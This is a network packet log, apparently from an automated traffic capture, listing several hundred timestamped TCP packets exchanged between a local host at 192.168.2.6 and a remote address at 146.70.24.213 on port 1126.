Oct 12, 2024 20:30:05.882940054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.882941961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.882972002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883003950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883012056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883038998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883073092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883081913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883105040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883136988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883143902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883169889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883202076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883208990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883234024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883280993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883291960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883315086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883346081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883353949 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883374929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883415937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883424997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883460045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883491993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883502007 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883527994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883562088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883573055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.883606911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883637905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.883645058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.929729939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.967463017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967578888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967609882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967633009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.967642069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967675924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967680931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.967710018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967742920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967749119 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.967775106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.967813015 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.968914032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969027996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969060898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969068050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969114065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969152927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969162941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969197989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969237089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969264030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969299078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969331026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969346046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969371080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969402075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969412088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969436884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969469070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969474077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969502926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969535112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969541073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.969568968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.969605923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970186949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970237970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970282078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970289946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970340014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970372915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970379114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970422029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970472097 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970473051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970523119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970556974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970561981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970607996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970643044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970645905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970675945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970707893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970719099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970741034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970772982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970782995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970805883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970841885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970843077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970875025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970909119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970916033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.970941067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970972061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.970978022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.971004009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971038103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971040964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.971066952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971098900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971116066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.971132040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971164942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971174002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.971199989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971232891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.971234083 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972174883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972230911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972239971 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972265005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972313881 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972316027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972347975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972388983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972398043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972453117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972486019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972501040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972515106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972563982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972565889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972618103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972656965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972666979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972702026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972728968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972744942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972762108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972795010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972809076 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972827911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972860098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972877026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972888947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972922087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972938061 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.972954988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.972989082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.973002911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.973021984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.973053932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.973061085 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.973084927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.973129034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.974620104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974673033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974718094 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.974724054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974759102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974791050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974806070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.974824905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974872112 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.974875927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974910021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974941015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.974955082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.974973917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975018978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975024939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975052118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975085974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975090981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975119114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975164890 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975199938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975231886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975265026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975291014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975317001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975352049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975367069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975402117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975435019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975440979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975469112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975518942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975519896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975553036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975590944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975611925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975645065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975677967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975682020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975707054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975744009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975755930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975790024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975821972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975826979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975856066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975888014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975895882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975924015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975955009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.975961924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.975987911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976027012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.976068020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976102114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976135969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976140976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.976187944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976219893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976227999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.976253033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976285934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.976303101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.023633957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.060098886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060165882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060197115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060224056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.060249090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060282946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060309887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.060316086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060348988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060358047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.060381889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.060424089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.061508894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061567068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061595917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061625957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.061655045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061686993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061719894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061721087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.061758995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.061774015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061808109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061836004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.061852932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.062604904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062705040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062736034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062738895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.062781096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.062787056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062820911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062872887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062876940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.062907934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062939882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.062953949 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.062974930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063007116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063024044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063057899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063090086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063121080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063123941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063155890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063189983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063203096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063242912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063271999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063294888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063327074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063360929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063371897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063391924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063419104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063457012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063488960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063502073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063522100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063555956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063566923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063589096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063622952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063638926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063656092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063688993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063695908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063720942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063749075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063767910 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063781977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063813925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063846111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063858032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063884974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063916922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063929081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063949108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.063965082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.063982010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064013958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064027071 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.064675093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064703941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064728022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.064753056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064786911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064807892 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.064820051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064852953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.064876080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065021038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065054893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065072060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065144062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065314054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065335989 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065344095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065395117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065418005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065445900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065496922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065498114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065530062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065566063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065581083 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065598011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065639973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065673113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065684080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065707922 CEST	1126	49710	146.70.24.213	192.168.2.6
